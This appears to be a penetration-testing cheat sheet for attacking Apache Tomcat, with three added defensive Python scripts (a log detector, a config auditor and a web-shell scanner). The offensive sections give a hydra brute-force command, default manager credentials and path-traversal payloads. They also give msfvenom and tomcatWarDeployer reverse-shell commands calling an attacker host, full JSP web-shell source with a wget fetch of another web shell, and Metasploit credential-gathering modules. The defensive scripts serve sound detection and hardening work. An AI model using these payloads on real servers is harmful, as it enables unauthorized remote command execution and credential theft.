Tomcat

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Try Hard Security Group


Discovery

  • Usually runs on port 8080

  • Common Tomcat error:

Enumeration

Version Identification

To find the Apache Tomcat version, a simple command can be run:

curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat

Manager Files Location

Identifying the exact locations of the /manager and /host-manager directories matters because their names may have been changed. Brute-forcing directory names is recommended to locate these pages.

Username Enumeration

For Tomcat versions older than 6, it is possible to enumerate usernames via:

msf> use auxiliary/scanner/http/tomcat_enum

Default Credentials

The /manager/html directory is particularly sensitive because it allows uploading and deploying WAR files, which can lead to code execution. It is protected by HTTP basic authentication, and common default credentials are:

  • admin:admin

  • tomcat:tomcat

  • admin:

  • admin:s3cr3t

  • tomcat:s3cr3t

  • admin:tomcat

These credentials can be tested using:

msf> use auxiliary/scanner/http/tomcat_mgr_login

Another directory worth noting is /manager/status, which shows the Tomcat and OS version, helping to identify vulnerabilities.

Brute Force Attack

To attempt a brute-force attack on the manager directory, one can use:

hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

Common Vulnerabilities

Password Backtrace Disclosure

Accessing /auth.jsp may reveal the password in a backtrace under fortunate circumstances.

Double URL Encoding

The CVE-2007-1860 vulnerability in mod_jk allows double URL encoding path traversal, enabling unauthorized access to the management interface via a specially crafted URL.

To access the Tomcat management web, go to: pathTomcat/%252E%252E/manager/html

/examples

Apache Tomcat versions 4.x to 7.x include example scripts that are susceptible to information disclosure and cross-site scripting (XSS) attacks. These scripts, listed comprehensively below, should be checked for unauthorized access and potential exploitation. Find more information here

  • /examples/jsp/num/numguess.jsp

  • /examples/jsp/dates/date.jsp

  • /examples/jsp/snp/snoop.jsp

  • /examples/jsp/error/error.html

  • /examples/jsp/sessions/carts.html

  • /examples/jsp/checkbox/check.html

  • /examples/jsp/colors/colors.html

  • /examples/jsp/cal/login.html

  • /examples/jsp/include/include.jsp

  • /examples/jsp/forward/forward.jsp

  • /examples/jsp/plugin/plugin.jsp

  • /examples/jsp/jsptoserv/jsptoservlet.jsp

  • /examples/jsp/simpletag/foo.jsp

  • /examples/jsp/mail/sendmail.jsp

  • /examples/servlet/HelloWorldExample

  • /examples/servlet/RequestInfoExample

  • /examples/servlet/RequestHeaderExample

  • /examples/servlet/RequestParamExample

  • /examples/servlet/CookieExample

  • /examples/servlet/JndiServlet

  • /examples/servlet/SessionExample

  • /tomcat-docs/appdev/sample/web/hello.jsp

Path Traversal

In vulnerable Tomcat configurations you can gain access to protected directories in Tomcat using the path: /..;/

So, for example, you might be able to access the Tomcat manager page by accessing: www.vulnerable.com/lalala/..;/manager/html

Another way to bypass protected paths using this trick is to access http://www.vulnerable.com/;param=value/manager/html
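Added example (not from the original page): a small Python access-log check, written from the defender's side, that collapses the three obfuscations above (the %252E%252E double encoding, the /..;/ segment and the /;param=value/ segment) into a normalized path and reports requests that both use one of those tricks and end up on /manager or /host-manager. The log lines are constructed; the line format assumed is Tomcat's AccessLogValve common pattern.

```python
import re
from urllib.parse import unquote

# Constructed Tomcat AccessLogValve lines (common log format); not taken from any real host.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /lalala/..;/manager/html HTTP/1.1" 200 15324
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /;param=value/manager/html HTTP/1.1" 200 15324
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /app/%252E%252E/manager/html HTTP/1.1" 403 0
10.0.0.3 - - [01/Jan/2024:10:00:04 +0000] "GET /docs/ HTTP/1.1" 200 5120
10.0.0.3 - - [01/Jan/2024:10:00:05 +0000] "GET /shop/items;jsessionid=abc/list HTTP/1.1" 200 812
"""

ADMIN_PREFIXES = ("/manager", "/host-manager")
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) HTTP/[\d.]+" (\d{3})')


def normalize_path(raw: str) -> str:
    """Collapse the obfuscations: decode twice (catches %252E%252E), strip
    ;path-parameters from every segment (catches ..;/ and /;param=value/),
    then resolve . and .. segments."""
    p = unquote(unquote(raw.split("?", 1)[0]))
    out = []
    for seg in p.split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def obfuscation_indicators(raw: str) -> list:
    """Name each trick present in the raw request path."""
    found = []
    if "..;" in raw:
        found.append("semicolon traversal (..;/)")
    if re.search(r"/;[^/]*/", raw):
        found.append("path parameter segment (/;param=value/)")
    if re.search(r"%25[0-9a-fA-F]{2}", raw):
        found.append("double URL encoding (%25..)")
    return found


def scan_access_log(text: str) -> list:
    """Return (client_ip, status, raw_path, normalized_path, indicators) for each
    request that uses one of the tricks AND normalizes into a manager app."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _method, raw, status = m.groups()
        ind = obfuscation_indicators(raw)
        norm = normalize_path(raw)
        if ind and norm.startswith(ADMIN_PREFIXES):
            alerts.append((ip, int(status), raw, norm, ind))
    return alerts


if __name__ == "__main__":
    for ip, status, raw, norm, ind in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{ip} {status} {raw} -> {norm}: {', '.join(ind)}")
```

The plain /manager/html hit and the ;jsessionid request are deliberately left out of the alerts: the first uses no obfuscation and the second is normal servlet path-parameter traffic. Alerting on the normalized target rather than the raw string is what keeps the rule from going quiet when the attacker changes the filler segment.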

RCE

Finally, if you have access to the Tomcat Web Application Manager, you can upload and deploy a .war file (execute code).

Limitations

You will only be able to deploy a WAR if you have enough privileges (roles: admin, manager and manager-script). Those details can be found under tomcat-users.xml, usually defined in /usr/share/tomcat9/etc/tomcat-users.xml (varies between versions) (see the POST section).
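Added example (not Tomcat's code and not from the original page): a Python audit of a tomcat-users.xml that flags the default credential pairs listed in the Default Credentials section and the role assignments the Limitations paragraph describes. The sample file is constructed; the role names beyond the page's admin/manager/manager-script are the current manager-gui, manager-script, manager-jmx, admin-gui and admin-script roles.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml; not copied from any real host.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cr3t" roles="manager-gui,manager-script"/>
  <user username="deploy" password="a-long-unique-passphrase-for-ci" roles="manager-script"/>
  <user username="ops" password="admin" roles="admin-gui"/>
</tomcat-users>
"""

# The default credential pairs listed on this page.
DEFAULT_CREDENTIALS = {
    ("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""),
    ("admin", "s3cr3t"), ("tomcat", "s3cr3t"), ("admin", "tomcat"),
}
DEFAULT_PASSWORDS = {pw for _, pw in DEFAULT_CREDENTIALS}

# Roles that reach the Manager / Host-Manager apps. "manager" and "admin" are the
# older names the page mentions; the *-gui/*-script split is the current scheme.
PRIVILEGED_ROLES = {"manager", "admin", "manager-gui", "manager-script",
                    "manager-jmx", "admin-gui", "admin-script"}


def _local(tag: str) -> str:
    """Strip the XML namespace so the check works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text: str) -> list:
    """Return (username, finding) pairs for every user element."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username", "")
        pw = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if (name, pw) in DEFAULT_CREDENTIALS:
            findings.append((name, "default credentials"))
        elif pw in DEFAULT_PASSWORDS:
            findings.append((name, "well-known default password"))
        # Tomcat's Manager How-To advises against giving one account both the
        # GUI and the script role, since the GUI session can then drive deploys.
        if {"manager-gui", "manager-script"} <= roles:
            findings.append((name, "manager-gui and manager-script on the same account"))
        priv = sorted(roles & PRIVILEGED_ROLES)
        if priv:
            findings.append((name, "privileged roles: " + ",".join(priv)))
    return findings


if __name__ == "__main__":
    for user, finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {finding}")
```

Run it against the real file located with the find command in the POST section; the "privileged roles" entries are the inventory of accounts that can deploy WARs, which is the list worth reconciling with who actually needs to.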

# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"

Metasploit

Metasploit is a powerful tool for performing security analysis and advanced attacks. It provides many built-in modules for attacking Tomcat applications. You can use Metasploit effectively to discover and exploit weaknesses in Tomcat systems.

use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

MSFVenom Reverse Shell

  1. Generate the WAR to deploy:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war

  2. Upload the revshell.war file and access it (/revshell/):

Bind and reverse shell with tomcatWarDeployer.py

In some scenarios this doesn't work (for example old versions of sun)

Download

git clone https://github.com/mgeeky/tomcatWarDeployer.git

Reverse shell

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

Bind shell

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

Using Clusterd

clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

Manual method - Web shell

Create index.jsp with this content:

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it

You could also install this (it allows upload, download and command execution): http://vonloesch.de/filebrowser.html

Manual Method 2

Get a JSP web shell such as this one and create a WAR file:

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
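Added example (not from the original page): a Python check, for the administrator of a Tomcat host, that walks the webapps tree for JSPs carrying the pattern both manual web shells above share (a request parameter feeding Runtime.exec or ProcessBuilder) and lists every .war present so the deployed inventory can be compared with what was intentionally deployed. The sample tree and files are constructed; the standard webapps/ layout is assumed.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the manual web shell above. Either alone is common in
# legitimate code; both in one JSP is what makes it worth a look.
INDICATORS = {
    "process-exec": re.compile(
        r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(|new\s+ProcessBuilder\s*\("),
    "request-param": re.compile(r"request\s*\.\s*getParameter\s*\("),
}


def scan_jsp_source(text: str) -> list:
    """Sorted names of the indicators found in one JSP's source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def is_suspected_shell(indicators: list) -> bool:
    return "process-exec" in indicators and "request-param" in indicators


def scan_webapps(webapps_dir: str) -> dict:
    """Map relative path -> indicators for every .jsp/.jspx with at least one
    indicator. Every .war file is listed too (empty list) for inventory review."""
    hits = {}
    for path in Path(webapps_dir).rglob("*"):
        rel = str(path.relative_to(webapps_dir))
        if path.suffix == ".war":
            hits[rel] = []
        elif path.suffix in (".jsp", ".jspx"):
            ind = scan_jsp_source(path.read_text(errors="replace"))
            if ind:
                hits[rel] = ind
    return hits


# Constructed samples: a harmless JSP and a fragment with the shell pattern.
BENIGN_JSP = '<%@ page import="java.util.Date" %><p>Now: <%= new Date() %></p>'
SUSPECT_JSP = ('<%@ page import="java.io.*" %><% String c = request.getParameter("cmd");'
               ' Process p = Runtime.getRuntime().exec(c); %>')


def demo_scan() -> dict:
    """Write the samples into a throwaway webapps tree and scan it."""
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "ROOT").mkdir()
        (Path(d) / "ROOT" / "index.jsp").write_text(BENIGN_JSP)
        (Path(d) / "backup").mkdir()
        (Path(d) / "backup" / "cmd.jsp").write_text(SUSPECT_JSP)
        (Path(d) / "backup.war").write_bytes(b"PK\x03\x04")  # placeholder archive header only
        return scan_webapps(d)


if __name__ == "__main__":
    for rel, ind in sorted(demo_scan().items()):
        tag = "SUSPECTED WEB SHELL" if is_suspected_shell(ind) else "review"
        print(f"{tag}: {rel} {ind}")
```

Point scan_webapps at the real webapps directory (and at the work directory, since Tomcat keeps compiled JSP sources there) to use it outside the demo.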

POST

The Tomcat credentials file is named tomcat-users.xml

find / -name tomcat-users.xml 2>/dev/null

Other ways to gather Tomcat credentials:

msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat

Other Tomcat scanning tools
